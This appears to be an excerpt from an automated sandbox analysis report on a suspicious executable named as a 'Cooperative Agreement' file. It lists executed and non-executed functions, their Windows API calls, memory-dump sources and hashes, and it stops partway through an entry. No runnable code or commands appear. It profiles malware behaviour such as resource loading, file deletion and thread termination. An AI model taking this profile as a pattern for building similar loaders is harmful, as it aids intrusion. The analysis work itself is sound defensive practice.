Function 00408DEE Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00408DFB
InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
CoInitialize.OLE32(00000000), ref: 00408E1D

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CommonControlsInitInitializememset
String ID:
API String ID: 2179856907-0
Opcode ID: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
Instruction ID: d18f3e268914b4fee2ab689e9e6bda8f6ab82eec5aee9dd7765ec6ce908ab83c
Opcode Fuzzy Hash: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
Instruction Fuzzy Hash: 12E08CB088430CBBEB009BD0DC0EF8DBB7CEB00315F0041A4F904A2280EBB466488B95

Function 004098C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(02399740,02399740,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9

Strings

$0A, xrefs: 004098CF

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: EnvironmentVariable
String ID: $0A
API String ID: 1431749950-513306843
Opcode ID: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
Instruction ID: a83057451cf148fd94e5dae0918d05dd15dd477b401c26288c9a060c20ad275f
Opcode Fuzzy Hash: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
Instruction Fuzzy Hash: E7C01231619201BBD710EA14C904B57BBE5EB50345F04C439B044912B0C338CC44D705

Function 0040ADC0 Relevance: 3.1, APIs: 2, Instructions: 65
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040D498: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
Part of subcall function 0040D498: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E

CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040ADF3
HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AE15

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CriticalSection$AllocCreateEnterFileHeapLeave
String ID:
API String ID: 3705299215-0
Opcode ID: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
Instruction ID: 12139a0eb1477c71ece9156acb4b07c5ee84e209973367f4cf7a68f803bf58ce
Opcode Fuzzy Hash: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
Instruction Fuzzy Hash: C1119331140300ABC2305F1AEC44B57BBF9EB85764F14863EF5A5A73E0C7759C158BA9

Function 0040DBCA Relevance: 3.1, APIs: 2, Instructions: 61
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DD1D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DBDB,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040DD5E

RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
memset.MSVCRT ref: 0040DC35

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Heap$AllocateFreememset
String ID:
API String ID: 2774703448-0
Opcode ID: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
Instruction ID: c1bdd2e89517895a38d7a8cc2bcc280f97e8981c2924b00dcd90f9207400bfe8
Opcode Fuzzy Hash: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
Instruction Fuzzy Hash: E51167729043149BC320DF59DC80A8BBBE8EF88B10F01492EB988A7351D774E804CBA5

Function 00401FA9 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00402000
RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 0040200B

Part of subcall function 004053C7: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 004053D7

Part of subcall function 00405436: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
Part of subcall function 00405436: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
Part of subcall function 00405436: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
String ID:
API String ID: 1205394408-0
Opcode ID: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
Instruction ID: f8114c552bbb016f0a76c43bd4124e9f0fb198a1ce0b642fe03d48e839951556
Opcode Fuzzy Hash: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
Instruction Fuzzy Hash: 36F0C030414505AADA257B32EC8299A7E36EB08308B42C43FF440714F2CF3E9D69AE5D

Function 0040DE30 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47

Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02390000,00000000,0000000C,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6AE
Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02390000,00000000,00000010,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6C2
Part of subcall function 0040E6A0: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6EB

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocHeap$CreateValue
String ID:
API String ID: 493873155-0
Opcode ID: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
Instruction ID: f6fb69b35e6ce2edff263c55ffd8902d3e18a9f91630c6f11d167ca4d15ccc07
Opcode Fuzzy Hash: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
Instruction Fuzzy Hash: 4ED012309C8304ABE7402FB1BC0A7843B789708765F604835F509572D1D9BA6090495C

Function 0040A7B9 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000002,00000080,0040A7F2,02399740,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A7D0
DeleteFileW.KERNELBASE(00000000,0040A7F2,02399740,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A7DA

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
Instruction ID: f7dd43ce8ab679ab9acf2fbd66ade7664d9bbbd5be98dbe0a51a073a4b2bc51f
Opcode Fuzzy Hash: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
Instruction Fuzzy Hash: 00D09E30408300B6D7555B20C90D75ABAF17F84745F14C43AF485514F1D7798C65E70A

Function 0040DE60 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE(02390000,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE69
TlsFree.KERNELBASE(0000000D,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE76

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: DestroyFreeHeap
String ID:
API String ID: 3293292866-0
Opcode ID: e1e86a498c82862297bb4ba2eeef0c9791047cff053e7cc11c8159107c07dceb
Instruction ID: 39e23e6c0b6f630abd0a78494d594864f6bb0b6a3747c7bb50b876903a384421
Opcode Fuzzy Hash: e1e86a498c82862297bb4ba2eeef0c9791047cff053e7cc11c8159107c07dceb
Instruction Fuzzy Hash: 94C04C71158304ABCB049BA5FC488D57BBDE74C6153408564F51983661CA36E4408B58

Function 0040A9D0 Relevance: 2.5, APIs: 2, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040AA13
CloseHandle.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AA1B

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
Instruction ID: 9ff7f62518d4b0577bac71a3516b051fbd3d19e36237879e48dc57cbe5217eec
Opcode Fuzzy Hash: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
Instruction Fuzzy Hash: E0F05E32600200A7CA216B5AED05A8BBBB2EB85764B11853EF124314F5CB355860DB5D

Function 00402BFA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1

GetShortPathNameW.KERNEL32(02399740,02399740,00002710), ref: 00402C34

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9

Part of subcall function 00409B80: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B8C

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040DF50: HeapFree.KERNEL32(02390000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
String ID:
API String ID: 192546213-0
Opcode ID: 1518335539abc649e2e9bd3b93edd1db4bfbadc64f7801d47678a29de43b85a9
Instruction ID: 7a2999830b1481a9d7ef80217fec4737815e267699ad494388d5f61b71452053
Opcode Fuzzy Hash: 1518335539abc649e2e9bd3b93edd1db4bfbadc64f7801d47678a29de43b85a9
Instruction Fuzzy Hash: F6012D75508201BAE5007BA1DD06D3F76A9EFD0718F10CD3EB944B50E2CA3D9C599A5E

Function 0040AA40 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040AA08,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA67

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
Instruction ID: b59f1f917ceac4f5cea587e7357412edb8aff685aadda2d04846933fd6210d73
Opcode Fuzzy Hash: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
Instruction Fuzzy Hash: 0AF09276105700AFD720DF58D948F97BBE8EB58721F10C82EE69AD3690C770E850DB61

Function 00402BC1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
Instruction ID: e96e1892c4c724b03879bd5233d00e0abab71770c233aa8573b83279bd435b66
Opcode Fuzzy Hash: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
Instruction Fuzzy Hash: E6D0126081824986D750BE65850979BB3ECE700304F60883AD085561C1F7BCE9D99657

Function 00409BA0 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
Instruction ID: 6d87291edcf2eeb8e990bf82b01346f6326b2aefffcea0088477b931f0527044
Opcode Fuzzy Hash: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
Instruction Fuzzy Hash: 6EC04C717441007AD6509B24AE49F5776E9BB70702F00C4357545D15F5DB70EC50D768

Function 0040D2C4 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

TlsFree.KERNELBASE(004011D8,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040D2E1

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: afb8170c881060827f7b708402de6715e31012ce767a183e2a7e5af61eff3ca6
Instruction ID: 02f19102e46f6fc925772832a959dff7ad61b801f58b10c94ac68856fb14f403
Opcode Fuzzy Hash: afb8170c881060827f7b708402de6715e31012ce767a183e2a7e5af61eff3ca6
Instruction Fuzzy Hash: 04C04C30405100DBDF268B44ED0C7D53671A784305F4484BD9002112F1CB7C459CDA5C

Function 00409B40 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
Instruction ID: 1bee1f37f93e9d35684b03c2e4756e6010034fad4ed660fefd81427f3766245b
Opcode Fuzzy Hash: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
Instruction Fuzzy Hash: 2AB012702C43005AF2500B105C46B8039609304B43F304024B2015A1D4CBF0108045AC

Function 00409B30 Relevance: 1.5, APIs: 1, Instructions: 3memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409B36

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: DestroyHeap
String ID:
API String ID: 2435110975-0
Opcode ID: 9f5e47457f218c908017f92e5e7370515ba6a022eaaca9f0545f96318fbd8d58
Instruction ID: ab699811fd0d87702ef007ec9d9e0afa2980276031b74f33cf565c9ea9518c6e
Opcode Fuzzy Hash: 9f5e47457f218c908017f92e5e7370515ba6a022eaaca9f0545f96318fbd8d58
Instruction Fuzzy Hash: 98900230404000CBCF015B10ED484843E71F74130532091749015414B0CB314451DA48

Non-executed Functions

Function 004026B8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9

Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1

Part of subcall function 00409C80: memcpy.MSVCRT(?,00000000,00000000,?,?,00402705,02399740,02399740,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000), ref: 00409C90

FreeResource.KERNEL32(?,02399740,02399740,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
String ID:
API String ID: 4216414443-0
Opcode ID: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
